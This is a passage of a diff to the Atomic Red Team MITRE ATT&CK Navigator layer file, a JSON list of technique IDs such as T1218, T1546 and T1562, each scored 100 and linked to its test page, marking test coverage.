.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"h
ttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491
.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techn
iqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546
.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1
546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/
master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-r
ed-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/red
canaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://g
ithub.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"http
s://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled
":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://g
ithub.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.c
om/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file +{"version":"4.2","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"h
